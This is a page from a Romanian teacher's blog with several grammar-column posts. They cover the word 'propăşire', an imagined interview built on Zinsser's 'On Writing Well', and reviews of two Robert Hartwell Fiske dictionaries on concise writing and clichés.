carteadeschisa.ro Rss

Cuvântul propăşire

Posted on : 18-11-2015 | By : admin | In : MInutul de gramatică

0

Azi în cancelarie o colegă mai tânără mi-a atras atenţia asupra unei probleme de limbă. Este vorba de cuvântul propăşire. A spus că s-a uitat foarte atentă la jurământul depus aseară de  miniştrii noului cabinet Cioloş şi a văzut că toţi spuneau „Jur să-mi dăruiesc toată puterea şi priceperea pentru propăşirea spirituală şi materială a poporului român…”.

Problema dumneaei era că majoritatea elevilor din anii de liceu, nici nu mai vorbim de cei de la gimnaziu habar n-aveau ce înseamnă cuvântul. Îşi dăduse seama de asta în momentul în care vorbise la clasa a XI-a de revistele paşoptiste şi una dintre cele întemeiate de M. Kogălniceanu se numea Propăşirea din anul 1844. Mi-a spus că a găsit doar un singur elev din 60 care ştia răspunsul corect. Amuzat, m-am apucat pe loc să fac familia de cuvinte într-o manieră fantezistă, cum credeam atunci. Cum s-ar numi cel care duce spre progres? Propăşitor. Dar adjectivul cum o suna: propăşit. Şi atunci mi-a sunat clopoţelul. Dar cum ar suna adjectivul pentru cel care  nu ştie sau nu a învăţat: nepropăşit. Probabil că atunci când îi vom reproşa cuiva că este nepropăşit, se va simţi mult mai puţin jignit (pentru că, evident, nu ştie cuvântul!) decât dacă îi vom spune analfabet sau semi alfabetizat. Totuşi, e periculos cu aluziile! Evident că un om care nu ştie ce înseamnă cuvântul propăşire, nu va sesiza ironia (uneori cu intenţii corectoare).

Ideea este că am încercat la propriile clase să văd dacă acea colegă a avut dreptate. Şi, din păcate, a început între elevi o „părerologie” de m-a durut capul. Unul a spus că ar fi ceva despre o ceartă. Alta  a zis că ar fi o chestie cu mers înainte. Unul a sesizat că ar putea fi ceva care ţine de avans. Altul a zis că e desigur un dans. Fără acel joc de marcat zonele calde şi reci probabil că toată oră mi-aş fi pierdut-o cu toată erorile posibile. Până la urmă, am găsit de fiecare dată un isteţ să sesizeze sensul corect, acela de progres.

Un alt coleg a admirat acest cuvânt şi a spus: „Uite, Domnule, ce ingeniozitate şi intuiţie aveau paşoptiştii odinioară!” Cum pornise pe o pantă a laudelor, am făcut o conexiune cumva nepotrivită. Mi s-a părut că este o creaţie internă un astfel de cuvânt venind din tendinţa paşoptistă de a refuza neologismele prin propunerea unor cuvinte de sorginte românească de tipul: gâtlegău (pentru cravată), nasştergău (pentru batistă), cuncorn (pentru inorog). Ideea este că anumite cuvinte permit astfel de creaţii interne, în timp ce altele sunt rizibile, deşi am aflat cu stupoare că sunt considerate de unii adevăratele cuvinte româneşti (http://raluxa.com/de-ce-scurtati-cuvintele/) , iar în altă parte că astfel de cuvinte au intrat în acel buclucaş dicţionar al lui V. Stati Dicţionar moldovenesc-românesc (http://ziarullumina.ro/cuvant-inainte-despre-o-escrocherie-lingvistica-64329.html) .

O simplă consultare a DEX-ului din 2012 lămureşte însă lucrurile astfel. Propăşire înseamnă „acţiunea de a propăşi şi rezultatul ei”. A propăşi înseamnă „a progresa. a prospera, a se dezvolta”. Cuvântul vine din latinescul progredior şi este un compus din pro + păşi (aşa cum intuiau elevii). Mai mult, există şi substantivul propăşitor, însă întâlnit azi rar (cât de?) şi înseamnă „care face să progreseze, să se dezvolte; înaintat, avansat, progresist”.

Mic Dicţionar Academic din 2010 este mai detaliat şi propune patru sensuri pentru propăşire, nu mai acceptă doar o trimitere la verbul de bază. Astfel sensul prim, „expansiune în spaţiu” e considerat o formă învechită. Sensul doi – „mişcare înainte, evolutivă”. Hm, ce ciudat ar suna teoria propăşirii a lui Darwin! Sensul 3 – „Dezvoltare în linie ascendentă”, iar ultimul sens – „progres obţinut de cineva sau de ceva”. Pentru propăşitor sunt propuse sensurile văzute anterior, dar ca sens prim este adăugat unul neaşteptat: „termen care precede un alt termen”. Şi verbul a propăşi are sensuri noi. Astfel se spune despre incendii cu sensul de a lua proporţii sau de a se întinde. (nm. Probabil un incendiator ar putea fi denumit şi un propăşitor de foc). Are şi sensul de a evolua „a trece de la o stare sau o formă inferioară de dezvoltare la una superioară”, pe care deja l-am văzut anterior.

În concluzie, bine că elevii nu au pus mâna prima oară pe acest Mic dicţionar enciclopedic (care totuşi are 2 volume foarte groase!) fiindcă altfel m-ar fi certat că nu le-am acceptat o parte dintre sensuri. Evident că azi sensul denotativ este acela de a progresa (multe alte dicţionare îl acceptă astfel – DLRC, Dicţionarul de sinonime din 2002, Dicţionarul lui L. Şăineanu din 1929), de aceea iată că trebuie să fim în dezacord cu cel din urmă dicţionar menţionat care propunea ca sens prim, „a precede”. De altfel, ce sens ar avea jurâmântul miniştrilor dacă am traduce a propăşi prin a precede?

Şi o reflecţie finală: sunt cuvinte compuse acceptate firesc, probabil lansate de figuri publice îndrăgite şi altele care fie nu au nicio şansă, cum a fost cazul cu acele cuvinte rizibile, fie trăiesc câteva luni, apoi se ofilesc la marginea vocabularului la capitolul curiozităţi.

William Zinsser: Cum să scrii bine

Posted on : 06-11-2015 | By : admin | In : MInutul de gramatică

1

Cărţile se fac din cărţi. Este un truism pe care aş vrea să-l remodelez un pic, anume cărţile ajungem parcă să le citim la recomandarea altor cărţi. Cu menţionarea absolut necesară a adverbului: uneori. Truismul, în schimb, pe lângă puţinătatea cunoaşterii, încearcă să fie şi totalitar. Ai senzaţia că doar cărţile duc la alte cărţi, nu şi experienţa, nu şi gândurile noastre, nu şi altceva în genere. Dar iată de ce am făcut această remarcă. În cadrul dicţionarului lui Robert Hartwell Fiske prezentat anterior[i], am aflat de cartea lui William Zinsser considerată un fel de Biblie a celor care se ocupă cu scrierea creativă. Căutând opul respectiv, am prins una dintre multele ediţii[ii] şi m-am pus pe răsfoit, uşor sceptic că aş mai putea învăţa ceva nou. Dar niciodată să nu spui nicodată, aţi uitat că truismele ne pândesc la tot pasul! Aşa că, forţându-vă răbdarea voastră şi încercând să strunesc ideile mele, haideţi să vedem despre ce e vorba.

Titlul promite o  îndrumare spre scris a oamenilor care evită în mod obişnuit o astfel de activitate: avocaţi, ingineri, medici, hm!… liceeni. Această chemare de sirenă scripturală nu avea prea mulţi suporteri înainte de apariţia internetului, oamenii păreau să aibă un fel de frică faţă de scris. Această teamă ar fi fost generată, se pare, de şcoală şi, în bună parte, de profesorul de literatură care continuă să spună şi azi ritos elevilor că nu vor ajunge niciodată la arta scriitorului X sau Y. Iată de ce miza cărţii lui Zinsser este să arate că nimeni nu se naşte cu darul scrierii şi că oricine gândeşte clar, poate să şi scrie clar (p. X). Fără îndoială, nu promite că va deschide calea spre a deveni un mare scriitor, dar oferă o posibilitate de a scrie bine şi pe înţeles.

Această frică de a scrie a dispărut între timp, de fapt nu mai scriem, ci tastăm (măcar pe email), dar nu a dispărut şi calitatea slabă a scrierii. Ba chiar a apărut paradoxul următor, anume că scriitorii devin mai buni odată cu această nouă posibilitate de exprimare, iar nescriitorii evoluează în mai rău. Pe de-o parte, scriitorii au evoluat spre o perfecţiune greu de egalat odinioară prin faptul că puteau revizui textul de câte ori doreau, prin eliminări şi inserţii. Nescriitorii s-au cufundat în schimb în verbozitate care a ajuns dusă la extrem – mesaje ilogice, exclamaţii, în genere limbajul de Facebook cu comentarii „geniale” de maxim 2-3 propoziţii simple, cuvinte monosilabice, like-uri!!!!

Cartea lui Zinsser încearcă să întindă o mână de ajutor celor căzuţi în gaura neagră a verbiajului, a celor care în genere nu au încredere că exprimarea pe larg a gândurilor le-ar putea aduce ceva bun. Este o carte care se adresează într-un fel celor ajunşi la extremitatea limbajului (atraşi poate de ţara de dincolo a tăcerii?), fie celor care vorbesc mult şi nu spun nimic, fie celor care spun prea puţin şi apoi sunt înciudaţi că mesajul le este interpretat în direcţii neconvenabile. Ideea este că, prin scris, trebuie să arătăm clar ce anume vrem şi doar atât. Nici mai mult, nici mai puţin. Prin urmare, cine vrea claritate în scris ar trebui să viziteze şi această carte, cel puţin aşa afirmă prefaţa ei.

Acum, cu voia dvs., să vedem cum arată cuprinsul. Nu vă îngrijoraţi, nu o să dau spoilere. Sunt atâtea lucruri interesante în cartea asta încât ar trebui să scriu la propriu o carte născută din carte. De aceea, am să mă dau de trei ori peste cap şi o să mă prefac în continuare într-un reporter (R) cu scopul  de a pune întrebările pe care le găsiţi în interviurile cu oricare scriitor. Dar, de data asta, le va ţine locul d. Zinsser (Z).

R: Bună ziua, dle Zinsser. Voi începe abrupt (aşa cum se procedează, de altfel, când se deschide o carte): când credeţi că se scrie cel mai bine?

Z: Bună ziua şi bine v-am găsit, dragi cititori români. S-a constatat că unii scriu bine ziua, alţii noaptea. Unii nu pot fără gălăgie, alţii fără linişte deplină. Unii scriu doar pe hârtie,  alţii doar la calculator (p. 5).

R: Eu cred că majoritatea sunt heterocliţi. Scriu şi, şi. Dar iată şi o altă întrebare de început: când trebuie revizuit textul?

Z: Unii nu revizuiesc decât la sfârşit, alţii după fiecare propoziţie, frază, capitol. (p. 5).

R: Da, cred că majoritatea artiştilor fac întâi o primă mână, apoi încep să-şi dichisească opera. Totuşi am întâlnit şi persoane opuse. Cum scriu o frază, poc o trimit la conducătorul lor de lucrare să-i dea aprobarea de continuare. În fine, dar iată un risc pe care l-au constatat mulţi dintre cei care scriu: de ce se pierd rapid cititorii?

Z: Trebuie să ţii cont de faptul că atenţia cititorului sare după 30 de secunde din text atrasă de un alt impuls din realitate. Acest lucru se întâmplă fiindcă mesajul scris nu a fost destul de clar formulat (p. 9).

R: Şi cum ar putea fi limpezit?

Z: Cu condiţia rescrierii ori a recitirii de mai multe ori a mesajului (eliminând ori adăugând de fiecare dată cuvinte, semne de punctuaţie, nuanţe noi) (p. 11). Mai mult,  cel care scrie trebuie să aibă în permanenţă în minte ce are de gând să spună. Surprinzător, adesea nu ştie. Trebuie să se întrebe dacă asta a dorit să scrie şi dacă s-a exprimat destul de clar. Nu uita: „a clear sentence is no accident” (p. 12).

R: Ok. Mi-a rămas în cap cuvântul eliminare. Dar cum îmi pot aerisi mesajul?

Z: Elimină cuvintele care nu spun nimic, gunoaiele lingvistice, cele care amorţesc interesul ori aruncă praf în ochii cititorului. Astfel de cuvinte servesc doar la camuflarea adevărului şi adesea la dezinformare. În acest sens, sunt foarte des folosite de limbajul corporatist, de cel politicianist fiindcă realizează false comunicate în care spun pe larg mai nimic. Îndemnul cărţii mele ar trebui să stea ca regulă tuturor: “simplify, simplify”(p. 17).

R: De ce scriu prost atât de mulţi oameni?

Z: O să-ţi dau un răspuns în oglindă răsturnată. Fiindcă puţini oameni realizează cât de prost scriu (p. 18).

R: Mda. Oare ce cifră să ascundă aceşti puţini! Să zicem că faci parte dintre cei care au revelaţia asta: Domnule, scriu prost! Ce aş putea face să o fac bine?

Z: Păi trebuie ca scrisul tău să sune natural. De aceea propune-ţi să fii tu însuţi (p. 20). Relaxează-te, fii încrezător în tine, de aceea scrie la persoana I. Cititorul va simţi în tine o altă persoană cu care poate sta la taifas. Dacă adopţi însă un discurs impersonal, tinzi să devii  plictisitor.

R: Dar sunt atâtea locuri unde trebuie să scrii impersonal. Ce facem în asemenea situaţii?

Z: Într-adevăr, există o mulţime de instituţii care nu-l vor pe EU în hârtiile lor; reviste, afaceri, şcoli; profesorii de literatură adesea descurajează complet folosirea persoanei I eu, cel mult permiţând un impersonal noi (…) Dar dacă nu ţi-e permis să-l foloseşti  pe EU în scris, măcar gândeşte-l atunci când scrii (p. 22). Astfel persoana care eşti nu va dispărea complet în anonimat.

R: Prin urmare, un prim pas spre scrierea de calitate ar fi utilizarea directă ori mascată a persoanei I. (De altfel, majoritatea sscririlor noastre nu se adresează unor instituţii). Dar numai atât trebuie să fac pentru a-mi dezvolta skill-ul de scris? Nu cred, răsfoind cartea dvs. Dar înainte de a-mi răspunde, să vă pun  întrebarea capitală ce înfricoşează pe oricine se apucă de o asemenea îndeletnicire. De fapt, pentru cine scriu?

Z: O fi întrebarea înfricoşătoare, dar are un răspuns foarte simplu: scrii pentru tine (p. 25).

R: Pardon!? Nu scriu pentru cititori ori măcar pentru cunoscuţii mei?

Z: Nu. O faci pentru tine. Audienţa te va urmări dacă o vei face într-un chip interesant. Dar pentru asta nu trebuie să încerci să vizualizezi audienţa fiindcă fiecare persoană este diferită, are alte interese, discursul tău va trebui mereu s-o ia în direcţii nedorite (p. 26).

R: Revenind la îmbunătăţirea scrierii. Ce modele îmi recomandaţi?

Z: Citeşte şi ce se scrie acum şi ce au scris maeştrii de odinioară. Scrisul se învaţă prin imitaţie. Cultivă însă cele mai bune modele. De asemenea, obişnuieşte-te să foloseşti dicţionarul. Învaţă, de pildă, să stăpâneşti fina gradaţie de sens dintre sinonime (p. 35).

R: Ce regulă mai trebuie să am în vedere la recorectare pe lângă eliminări şi adăugări de cuvinte?

Z: Teoretic, nu ar fi şi altceva. Totuşi, vezi cum sună mesajul. Cititorii percep mesajul nu numai vizual, dar şi auditiv. De aceea, cred că ar fi recomandabil să dai preţ cadenţelor şi sonorităţilor limbajului. În acest sens, aminteşte-ţi de citatul celebru: “Somebody out there is listening.” (p. 36- 37)

R: Mi se pare ce spuneţi cumva prea greu. Mai degrabă cred că a scrie e un fel de miracol!

Z: Nicidecum. Înveţi să scrii doar scriind. Este un alt truism, e adevărat, dar uitat de mulţi. De altfel, cu timpul, tot scriind, stilul tău plin de emfază şi de clişee se va clarifica (p. 49).

R: Căutând câteva date pe net despre carte, am observat că în ţara ta natală (SUA) eşti admirat în special pentru capitolul dedicat unităţii stilului. Ce înţelegi prin asta?

Z: De fapt, se ocupă tot de modul cum să-ţi îmbunătăţeşti scrisul. Atunci când scrii, foloseşte o singură persoană (scriem bine sau la persoana I-a sau la a III-a). Alege un singur timp: unii scriu mai bine folosind trecutul, cei mai mulţi însă se simt confortabil folosind prezentul. Alege o singură perspectivă asupra subiectului şi dezvolt-o (p. 52).

R: Dar cum pot să-mi amintesc ce am intenţionat să scriu dacă am fost întrerupt o vreme de la scris?

Z: Fă-ţi un plan anterior, dar nu fii prizonierul planului (p. 53), ci fii flexibil în funcţie de cursul studiului tău. E posibil să apară direcţii neprevăzute şi care par mai promiţătoare. Şi nu uita: Colectează înaintea redactării mai mult material decât ai să foloseşti. Ai de unde să alegi detaliile cele mai potrivite. Nu aduna însă în exces. “At some point you must stop researching and start writing.” (p. 59)

R: Ai putea sintetiza ideile tale despre unitate?

Z: Când vrei să scrii, gândeşte-te la regula celor 4 unităţi, ca să-l aproximez pe clasicul Boileau: O singură persoană, un singur timp, o singură perspectivă, un singur plan, dar flexibil.

R: La noi în România se pune accent în comentariile literare pe incipit şi final. Sunt oare acestea importante? De pildă, incipitul?

Z: Da, sunt foarte importante. Esenţiale, aş spune. Prima propoziţie  e cea mai importantă. Dacă nu atrage cititorul spre o a doua propoziţie, textul este mort. Şi dacă a doua nu ne îndrumă spre cea de-a treia, la fel. Şi aşa cu tot textul (p. 55).

R: Spuneţi-mi, e bine să ai un început scurt sau unul lung? Şi, în general, există o limită a începutului?

Z: Nu, totul depinde de publicul-ţintă. Într-un fel începi pentru un public literar (care probabil va accepta şi un început mai lung), altfel pentru unul specializat în ceva şi care are puţină răbdare. (…) Oricum, condiţia e să capturezi publicul imediat şi să-l seduci să citească (p. 56).

R: Ok, dar despre final? Trebuie neapărat să existe unul, la fel ca în textele clasice?

Z: Azi adesea nu, totuşi ar trebui să existe un marker de final dacă nu scrii un text literar. În astfel de situaţii, care sunt şi cele mai multe, foloseşte o formulă de tipul: „adunând, făcând bilanţul, în concluzie, prin urmare”.

R: Este important finalul? Mulţi îl neglijează.

Z: Şi rău fac. Este foarte importantă ultima propoziţie, altfel cititorul va pleca nemulţumit că ai un final catastrofal. De aceea, un final bun va lua cititorul prin surprindere şi îi va da senzaţia că nu-l desconsideră. Altfel se va despărţi cu o impresie proastă despre carte (p. 65).

R: Dar cum ar putea un final să-l surprindă pe cititor în mod plăcut?

Z: Mergi din nou la notiţe şi caută acolo ceva drăguţ, sau amuzant sau care aduce o lumină nouă asupra subiectului (p. 67).

R: Trecând la altceva, mă gândeam că în ultima vreme, a apărut şi posibilitatea, cel puţin în engleză, de a-ţi dicta textul. Oare, dacă aş vorbi pur şi simplu, ar suna textul mai natural ori măcar mai fluent?

Z: Eu zic să eviţi pe cât posibil forma dictată deoarece „Dictated sentences tend to be pompous, sloppy and redundant” (p. 79).

R: La final, vreau să vă spun că, de obicei, reuşesc să scriu bine din prima. Nu cred că mă privesc pe mine toate aceste sfaturi.

Z: Eu, dimpotrivă, afirm că numai rescrierea e cea care face diferenţa între un scriitor bun şi unul slab, deşi este un fapt greu de acceptat întrucât avem senzaţia că totul a ieşit bine din prima (p. 84). De fapt, este întotdeauna ceva de eliminat. Iată o listă cu care are de luptat orice scriitor:

“It’s not clear. It’s not logical. Its verbose. It’s klunky. It’s pretentious. It’s boring. It’s full of clutter. It’s full of clichés. It lacks rhythm. It can be read in several different ways. It doesn’t lead out of the previous sentence.” (pp. 84-85).

 Refuz să traduc citatele. Oricum, voi, rarii cititori care aţi ajuns până la sfârşitul articolului, ştiţi mai multă engleză decât mine. Aţi învăţat ceva din acest pseudodialog cu autorul? Credeţi-mă, este doar a suta parte din ceea ce găsiţi în cartea lui. Sau poate este chintesenţa? Cine ştie! A, de fapt puteţi ştii, dacă îi deschideţi cartea. Lectură plăcută, viitorilor mari scriitori!

 

[i] Robert Hartwell Fiske, To the point: A dictionary of concise writing, editura W. W. Norton & Company, New York, 2014

[ii] William, Zinsser. On writing well. The classic guide to writing nonfiction. 25th anniversary ed. New York: HarperCollins Publishers, 2001.

Posted on : 05-11-2015 | By : admin | In : Uncategorized

0

 

 

Dicţionarul scrierii concise a lui Robert Hartwell Fiske[1]

 

Alegerea unui titlu aduce cu sine o anume responsabilitate în faţa cititorilor. Ei se aşteaptă să găsească înăuntru ceea ce promite titlul. Nu mai mult, nu mai puţin. Până la urmă, nu funcţionează nicio justificare (existentă, eventual, în prefaţă) în situaţia când titlul e contradictoriu faţă de conţinut. În fond, titlul este cel care atrage primul pe cititori, este singur în câmpul nostru vizual, aduce cu sine promisiuni şi reverii. De aceea unii scriitori evită titlul pentru că probabil au constatat greutatea de a acorda titlul cu conţinutul. Aşa că mai bine nu-l folosesc.  Dar un asemenea procedeu nu poate funcţiona şi în domeniul lexicografiei, deoarece când faci un dicţionar nu îl poţi intitula simplu dicţionar ori, şi mai general, carte. Trebuie să spui ce anume vizează. Aici e cazul unei lucrări ştiinţifice, întreprinse cu metodă, care trebuie să genereze siguranţă şi, mai ales, corectitudine.

Robert Hartwell Fiske propune un titlu care derutează uşor: „To the point – A dictionary of concise writing”. Aşteptările sunt însă mai mari decât oferta. O sintagmă precum scrierea concisă, m-a făcut să mă gândesc la exprimarea spartană, la abilitatea de a formula în câteva cuvinte adevăruri puternice, la proverbele şi vorbele de spirit existente în atâtea cărţi ori circulând prin limba vorbită. Poate, exagerând un pic fantezia, la acele texte laconice (haiku, tanka) lăsate în urmă de samurai atunci când îşi făceau seppuku. De fapt, dicţionarul propune doar modul de a ajunge la scrierea concisă, de a elimina diferitele forme de prolixitate din frază. Cum am văzut şi într-un alt dicţionar al său[2], Harwell Fiske îşi îndreaptă interesul spre inventarierea greşelilor de limbă (aici exprimările prea lungi) şi spre propunerea unei forme mai scurte şi, cel mai adesea, mai pertinente.

Acum îi vom vedea argumentele, ne vom plimba printre exemplele sale şi vom cerceta valorile dicţionarului. Într-o prefaţă foarte scurtă, dl. Richard Lederer[3] observă apariţia fenomenului prolixităţii, al verbiajului în general, la vârsta adultă. Când suntem copii, ne exprimăm sumar şi arătăm în chip direct ceea ce dorim. Odată cu maturizarea însă, discursul se diversifică şi, mai ales, se încâlceşte. Ajungem să umflăm fraza până la ininteligibil. Notez aici că fraza ajunge să aibă tot felul de elemente toxice ori să devină un labirint în care sensul intenţionat de emiţător să fie doar unul printre altele. (Teoria pare, de altfel, atrăgătoare la prima vedere. Copilul – discurs concis, adultul – discurs confuz. În realitate, lucrurile sunt mai complicate şi, până la urmă, cine învaţă pe cine?)

De ce nu scriem simplu? Pentru că ne este frică să nu fim rău înţeleşi. Ori vrem să impresionăm pe alţii. Ori adevărul pe care-l spunem deranjează şi ne poate aduce prejudicii grave. Şi notez aici că, de fapt, prin limbă, adulţii se luptă între ei toată viaţa. Supravieţuiteşte în zonele de sus ale ierarhiei cine stăpâneşte bine arta războiului verbal. Dar autorul nu are astfel de ambiţii tactice. Doar vrea să dea oarece sfaturi despre cum să scrii bine. Şi, în această privinţă, îl invocă pe  William Zinsser (3) care afirma că  „nu poţi să scrii bine până ce nu te antrenezi tu însuţi să scrii cu puţine cuvinte[4].

În acest dicţionar al scrierii concise, găsim 3 secţiuni distincte: prima inventariază şi explică diferitele categorii de greşeli, o a doua detaliază formele de verbozitate aşa cum apar în texte şi propune alte forme reduse, iar o a treia parte – este un fel de dicţionar de sinonime în care intrării lingvistice concise i se oferă adesea numeroase sinonime prolixe.

În prima secţiune, în prefaţă este furnizată o interesantă definiţie a cuvintelor: „Cuvintele există pentru a fi gândite şi a fi aşadar formate, pentru a fi  scrise şi a fi revizuite şi chiar pentru a fi spuse şi apoi interzise[5]. Cum vedem, în limbă este o permanentă mişcare de du-te-vino, cuvintele aduc de fiecare dată o anume deschidere, dar aceasta trebuie abordată cu precauţii, în orice caz cu anume revizuiri şi, eventual, cu anume retractări. Iată stindardul spre care ne îndreaptă acest dicţionar. Deoarece „puţini dintre noi scriem fără efort”[6], trebuie să găsim diferite forme de a ne atenua verbozitatea, exprimarea încâlcită, lipsită de mesaj. Întâi ne este oferită o cale în patru paşi[7]: 1. Reducerea numărului de cuvinte în frază 2. Substituirea eventuală a unei fraze ori propoziţii cu un singur cuvânt; 3. Ştergerea cuvintelor ori a propoziţiilor inutile, lipsite de semnificaţie ori redundante; 4. recitirea şi rescrierea materialului pentru identificarea cuvintelor superflue.

Şi iată un sfat care nu ar trebui omis niciodată: „Întreabă-te dacă fiecare cuvânt din fiecare propoziţie a scrierii tale este necesar. Mai mult de atât, dacă este vital?”[8] Ideea este că noi înşine ar trebui să stăm cu un foarfece imaginar  atunci când formulăm ori ne recitim textul pentru a îndepărta excesele lingvistice, straturile nedorite ori nesemnificative. Notez faptul că exemplele pe care le voi oferi în continuare conţin în prima coloană formele prolixe, iar în cealaltă coloană propunerea concisă. Iată câteva criterii de eliminare a verbozităţii desprinse din corpul dicţionarului:

 

  1. Îndepărtarea elementelor superflue
Forma prolixă Forma concisă
ecranul arată listarea joburilor ecranul listează joburile
sistem GPS GPS
ultimul dintre toţi ultimul
a face conversaţie a conversa

 

  1. Evitarea eufemismelor
Forma prolixă Forma concisă
daune colaterale uciderea civililor
a avea abilitatea să a putea
         a păstra în minte a-şi aminti
         poziţie în schemă job

 

  1. Evitarea perifrazelor verbioase
Forma prolixă Forma concisă
             un număr limitat de obiecte un obiect disponibil
             o semnificativă proporţie câteva
    în viitorul apropiat curând
    a permite să a lăsa
    timpul iernii iarnă,
   grădină zoologică zoo
   scurt şi la obiect concis
   în cantitate suficientă de ajuns

 

  1. Evitarea clişeelor
Forma prolixă Forma concisă
   cu viteza luminii repede
   o fereastră de oportunitate o oportunitate
   falsă iluzie iluzie
   vechiul proverb proverbul

 

  1. Evitarea cuvintelor cu silabe multiple
Forma prolixă Forma concisă
   metodologie metodă
   remuneraţie plată
   substanţialitate substanţă
   notaţie notă
   notificare notiţă
   uzaj uz

 

  1. Evitarea cuplurilor
Forma prolixă Forma concisă
   nou şi inovativ fie nou, fie inovativ
   între mine şi tine între noi
   a combina împreună fie a combina, fie a uni
   diferit şi distinct fie diferit, fie distinct
   scump şi costisitor fie scump, fie costisitor
   lucruri esenţiale importante ori lucruri esenţiale ori importante
   oaspete invitat ori oaspete, ori invitat
   relicvă a trecutului relicvă
   separat şi autonom fie separat, fie autonom
   gândeam eu însumi gândeam
   necesitate vitală ori necesitate, ori vital
   prieten personal prieten

 

  1. Ştergerea unor cuvinte care duc la încurcături şi care de fapt nu spun nimic în plus
Forma prolixă Forma concisă
   şi un lucru ca acesta de şters
   în orice caz de şters
   orice ar fi de şters
   tipul acesta de lucruri de şters
   prin definiţie de şters

 

Într-o scurtă secţiune de la sfârşitul primei părţi se realizează un inventar al câtorva tipuri de jargon profesional. Astfel arată că sună neplăcut în jargonul de business cuvinte precum „a prioritiza” ori „parte componentă”. În jargonul juridic cuvinte precum „compensaţie”, ori „în concordanţă cu”. Iată rapid şi cuvinte din alte tipuri de jargon – folosirea unui limbaj evaziv ori pompos în politică: Exemplu – „eu confirm ceea ce spun, dar eu nici nu confirm, nici nu infirm ceea ce înseamnă asta[9]. „Atenţie focusată” (în jargonul jurnalistic), etc.

Prin urmare, verbozitatea constă în folosirea tautologiilor, a multiplicării inutile a silabelor, a cuvintelor, în apariţia clişeelor, a eufemismelor inutile care, de fapt, nu protejează de nimic în afara îngreunării mesajului. Evident că este discutabilă clasificarea propusă de dicţionar, se îndepărtează de propunerile lexicografice clasice, în domeniul greşelilor limbii lucrurile nu sunt la fel de bine fixate ca în porţiunile corecte. De obicei, dicţionarele vorbesc despre normă, nu despre abaterea de la normă. În dicţionarul lui Robert Hartwell Fiske AŞA NU este la început, urmând îndreptarea. În dicţionarele obişnuite, AŞA NU fie nu există, fie cel mult este plasat la sfârşitul intrării lexicografice.

 

 

 

[1] Robert Hartwell Fiske, To the point: A dictionary of concise writing, editura W. W. Norton & Company, New York, 2014

[2] Idem, The Dimwit’s dictionary, editura Marion Street Press, Portland, Oregon, 2012

[3] Idem, To the point…, 2014, pp. 6-7

[4] Idem, p.8 apud William K. Zinsser, On writting well, The classic guide to writing nonfiction, Ed. Harper Collins Publishers, New York, 2001

[5] Idem, p. 10

[6] Idem, p. 11

[7] Idem, p. 12-14

[8] Idem, p. 14

[9] Idem, p. 28.

Clişeul, banalitatea şi eroarea sau dimwitticismul

Posted on : 05-11-2015 | By : admin | In : MInutul de gramatică

0

 

Am găsit un dicţionar cu un nume bizar: The Dimwit’s dictionary, realizată de Robert Hartwell Fiske. Mă uit la ediţia a treia din 2012 realizată de editura Marion Street Press din Portland, Oregon. Ce este un dimwitt, în opinia acestui autor? În primul rând este antonimul witticismului (al vorbei de spirit,) care ar fi reprezentată de remarca sau fraza inteligentă. Iată de ce definiţia este realizată în oglindă, respectiv un dimwitticism ar reprezenta un loc comun, o frază banală. Altfel spus, conţine cuvinte şi fraze gata-făcute şi este folosit când suntem prea leneşi să gândim: „when we are too lazy to express what we think or even to discover how we feel”(p.18).
În consecinţă, colecţionarul de dimwitticisme Hartwell Fiske a clasificat toate aceste cuvinte care ocolesc gândirea în următoarele categorii.
1. Fraze străine – care adesea nu spun nimic nou – Exemplu: c’est la vie, mea culpa, modus vivendi, persona non grata, sine qua non, déjà vu, rara avis, vis-à-vis
2. Trucuri gramaticale (numite de autor „grammatical gimmicks”) – sunt acele fraze prin care vorbitorul nu poate să-şi explice gândurile sau sentimentele – Exemplu: şi chestii din astea; totuşi; înţeleg; ori asta, ori aia; tipul acesta de lucruri, ceva de genul, etcetera, etcetera.
3. Fraze neterminate – au rostul de a nu comunica gândul vorbitorului, ci de a întârzia ori tăia mesajul – Exemplu: îţi voi spune eu ceva; e interesant de notat; faptul rămâne evident; este important de realizat
4. Fraze infantile – arată lipsa de realism în aprecierea lucrurilor – Exemplu: pariez pe un munte de aur, în niciun caz, nici într-un milion de ani, întreaga mea viaţă. sunt sigur 100%, eu sunt la datorie 24 de ore din 24, eu nu sunt doctor (avocat, profesor, inginer) dar…, pe cât facem pariu?
5. Metafore muribunde – folosite în contexte nepotrivite şi deja lipsite de semnificaţie – Exemplu: afară este o junglă, sunt înfometat ca un lup, văd luminiţa de la capătul tunelului, la sfârşitul zilei, mi-ai frânt inima, am simţit fluturi în stomac, eu sunt centrul atenţiei, a fi mână în mână, sărutul morţii, a muta munţii din loc, mi-am plătit datoria faţă de societate, am ajuns în al nouălea cer
6. Cuvinte uzate – dacă sunt folosite în exces diminuează mesajul transmis Exemplu: acţiune, minunat, criză, efect, incredibil, interesant, parametru, scenariu, stupid
7. Exprimarea unor sentimente „plebeiene” (populare) – Exemplu: eşti drăguţ, sunt plictisit, gândeşti prea mult, de ce eu?, lucrurile astea se întâmplă altora, nu mie, nu am cuvinte pentru a descrie ceea ce simt
8. Prescripţii populare – aici se încadrează sloganurile sociale şi clişeele lingvistice – Exemplu: o imagine este mai bună decât o mie de cuvinte, mai bine mai târziu decât niciodată, fă ce zice popa, nu ce face popa, cu cât mai repede, cu atât mai bine; nu poţi să ai totul; nu te pot ajuta dacă nu te poţi singur ajuta, totul se întâmplă cu un motiv, vechile obiceiuri nu mor niciodată, tu poţi face diferenţa
9. Tautologii (numite de autor ecuaţiile Mac-Mac „quack equations”) – nu comunică nimic nou – Exemplu: un politician e un politician; o promisiune e o promisiune; mai mare e mai bun; Dumnezeu e iubire; ce-i corect e corect; legea e lege; ce a fost, a fost.
10. Superlative suspecte – persoanele care le folosesc se mişcă doar la modul „topmost”, respectiv între cele mai bune chestii – Exemplu: o persoană minunată; eu sunt un perfecţionist; celebritate, clasă, gentleman, personal prietenos, bogat şi faimos, a face diferenţa, lady, am cunoscut adevărata iubire
11. Termeni torpizi -care moleşesc, încetinesc comunicarea – Exemplu: am făcut un pas în spate pentru a vedea direcţia corectă, să avem un optimism moderat, să facem o acţiune de corectare, e timpul să prioritizăm, voi remedia situaţia, o acţiune corectivă, factor cheie, eu am un sentiment negativ în legătura cu asta
12. Termeni redundanţi – a spune acelaşi lucru cu alţi termeni – Exemplu: a plănui în avans, perioadă de timp, tocmai recent, experienţa mea din trecut, concluzia finală, a-şi focusa atenţia, a lua în considerare

